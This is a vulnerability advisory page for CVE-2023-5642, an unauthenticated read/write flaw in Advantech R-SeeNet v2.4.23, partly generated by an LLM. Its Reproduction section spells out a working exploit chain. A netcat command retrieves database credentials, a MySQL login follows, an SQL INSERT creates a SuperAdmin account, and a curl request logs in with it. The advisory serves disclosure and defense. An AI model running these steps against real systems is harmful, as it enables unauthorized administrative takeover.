VYPR
← All advisories
Unrated severityNVD Advisory· Published Oct 18, 2023· Updated Sep 13, 2024

Advantech R-SeeNet Unauthenticated Read/Write

CVE-2023-5642

Description

Advantech R-SeeNet v2.4.23 allows an unauthenticated remote attacker to read from and write to the snmpmon.ini file, which contains sensitive information.

AI Insight

LLM-synthesized narrative grounded in this CVE's description and references.

Advantech R-SeeNet v2.4.23 allows unauthenticated remote read/write to snmpmon.ini, exposing database credentials and SNMP community string.

Vulnerability

A vulnerability in Advantech R-SeeNet v2.4.23 allows an unauthenticated remote attacker to read from and write to the snmpmon.ini file. This file contains sensitive information including database login credentials (username and password) and a default SNMP community string [1].

Exploitation

An attacker can connect to the R-SeeNet service on TCP port 65031 and send commands to retrieve the database username and password. For example, sending get Web.last_version; Database.User; Database.Password yields the credentials. Using these credentials, the attacker can log in to the MySQL database (e.g., via mysql -h -u SNMPMON -p) and insert a new user with SuperAdmin privileges (rights=0) into the snmpmon.users table. The attacker can then log in to the R-SeeNet web UI using the newly created account [1].

Impact

Successful exploitation allows the attacker to gain administrative access to the R-SeeNet application. The attacker can read and write arbitrary data to the database, create privileged users, and fully compromise the R-SeeNet instance. This can lead to further attacks on the network [1].

Mitigation

The vendor has released a patch to address this vulnerability. Users should apply the vendor-supplied patch as soon as possible. No other workarounds are mentioned in the available reference [1].

References
  1. Advantech R-SeeNet snmpmon.ini Unauthenticated Read Write

AI Insight generated on May 26, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.

Affected products

2
  • Advantech/R-SeeNetllm-fuzzy2 versions
    =2.4.23+ 1 more
    • (no CPE)range: =2.4.23
    • (no CPE)range: 0

Patches

0

No patches discovered yet.

Vulnerability mechanics

Root cause

"Missing authentication on the R-SeeNet service listening on TCP port 65031 allows unauthenticated remote read/write access to the snmpmon.ini configuration file."

Attack vector

An unauthenticated remote attacker can connect to TCP port 65031 on the target host and send crafted commands to read or write the snmpmon.ini file [ref_id=1]. The advisory demonstrates reading sensitive values such as the database username and password by sending a simple netcat command with the keys "Database.User" and "Database.Password" [ref_id=1]. No authentication or prior access is required, making this a direct network-triggered attack.

Affected code

The vulnerability exists in the R-SeeNet service listening on TCP port 65031, which exposes the snmpmon.ini configuration file for unauthenticated read and write operations [ref_id=1]. The advisory does not specify the exact binary or script that implements this service.

What the fix does

The advisory states that the vendor released a patch on October 18, 2023, but does not describe the specific changes made [ref_id=1]. The fix likely involves adding authentication checks to the service on port 65031 or removing the ability to read/write snmpmon.ini remotely. Without the patch diff, the exact remediation mechanism cannot be confirmed.

Preconditions

  • networkThe target must be running Advantech R-SeeNet v2.4.23 with the service on TCP port 65031 exposed to the attacker's network.
  • authNo authentication or prior session is required.

Reproduction

1. From an attacker machine, run: `echo -n 'get Web.last_version; Database.User; Database.Password' | nc <target-host> 65031` to retrieve the database credentials. 2. Use the obtained credentials to log into the MySQL database: `mysql -h <target-host> -u SNMPMON -D snmpmon -p`. 3. Insert a new SuperAdmin user: `INSERT INTO snmpmon.users (company_id, username, password, name, surname, email, phone, rights, edit_device) VALUES(0, 'operator', PASSWORD('password123'), NULL, NULL, NULL, NULL, 0, 0);`. 4. Log into the R-SeeNet web UI with the created credentials: `curl -sk -d 'page=login_change&oper=0&username=operator&password=password123&submit=Login' 'https://<target-host>/index.php'` [ref_id=1].

Generated on May 26, 2026. Inputs: CWE entries + fix-commit diffs from this CVE's patches. Citations validated against bundle.

References

1

News mentions

0

No linked articles in our index yet.